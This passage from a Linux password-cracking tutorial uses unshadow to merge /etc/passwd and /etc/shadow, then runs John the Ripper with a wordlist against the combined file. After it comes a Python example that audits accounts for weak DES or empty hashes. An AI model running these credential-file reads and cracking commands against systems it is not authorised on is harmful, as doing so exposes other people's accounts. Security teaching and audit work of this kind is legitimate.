The actual password hash is stored in /etc/shadow, and this file is accessible only with root access to the machine. So try to get this file from your own Linux system, or first create a new user with a simple password. I will create a new user on my Linux system named happy, with password chess. Now that our new user is created, it's time to crack his password.

#unshadow

The unshadow command basically combines the data of /etc/passwd and /etc/shadow to create one file with username and password details. Usage is quite simple:

#unshadow /etc/passwd /etc/shadow > ~/crack

We redirected the output of the unshadow command to a new file called crack. Now this new file shall be cracked by john.
For the wordlist we shall be using the password list that comes with john on Kali Linux. It is located at /usr/share/john/password.lst, or you can use your own password lists too.

#john --wordlist=/usr/share/john/password.lst ~/crack

Use the "--show" option to display all of the cracked passwords reliably.
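As an added example (not part of the original tutorial), the following code reproduces what the unshadow step above does to /etc/passwd and /etc/shadow, and then classifies each merged hash the way hash-identifier did in Step 7.a, so an administrator can audit which accounts still carry a weak legacy DES(Unix) hash or no password at all. The passwd and shadow lines, the "legacy" account and its sha512crypt placeholder are constructed for this example; only the DES hash value comes from the tutorial.

```python
import re

# Constructed sample /etc/passwd and /etc/shadow lines (not real accounts).
# "happy" mirrors the tutorial's user; "legacy" carries the DES(Unix) crypt
# value the tutorial recovers in Step 7.
PASSWD_LINES = [
    "root:x:0:0:root:/root:/bin/bash",
    "happy:x:1001:1001:Happy User:/home/happy:/bin/bash",
    "legacy:x:1002:1002::/home/legacy:/bin/sh",
]
SHADOW_LINES = [
    "root:!:19000:0:99999:7:::",
    "happy:$6$saltsalt$PLACEHOLDERHASH.NOT.REAL:19000:0:99999:7:::",
    "legacy:24iYBc17xK0e.:19000:0:99999:7:::",
]

# Format rules in the spirit of hash-identifier (Step 7.a): modern crypt(3)
# hashes carry an algorithm prefix; a bare 13-character string from the
# ./0-9A-Za-z alphabet is traditional DES crypt.
HASH_RULES = [
    (re.compile(r"^\$6\$"), "sha512crypt"),
    (re.compile(r"^\$5\$"), "sha256crypt"),
    (re.compile(r"^\$y\$"), "yescrypt"),
    (re.compile(r"^\$1\$"), "md5crypt"),
    (re.compile(r"^[./0-9A-Za-z]{13}$"), "DES(Unix)"),
]


def identify_hash(field):
    """Classify a shadow password field; empty and locked fields get their own labels."""
    if field == "":
        return "empty"
    if field.startswith(("!", "*")):
        return "locked"
    return next((name for rx, name in HASH_RULES if rx.match(field)), "unknown")


def unshadow(passwd_lines, shadow_lines):
    """Merge passwd and shadow like unshadow(8): swap the 'x' field for the real hash."""
    hashes = dict(line.split(":")[:2] for line in shadow_lines)
    merged = []
    for line in passwd_lines:
        f = line.split(":")
        merged.append(":".join([f[0], hashes.get(f[0], f[1])] + f[2:]))
    return merged


def audit(passwd_lines, shadow_lines):
    """Report the hash type of every account that is not locked, so weak ones stand out."""
    report = {}
    for line in unshadow(passwd_lines, shadow_lines):
        user, field = line.split(":")[:2]
        kind = identify_hash(field)
        if kind != "locked":
            report[user] = kind
    return report
```

An account reported as DES(Unix) or empty is the one a wordlist run like the john command above will break first; migrating it to a modern crypt(3) scheme is the fix.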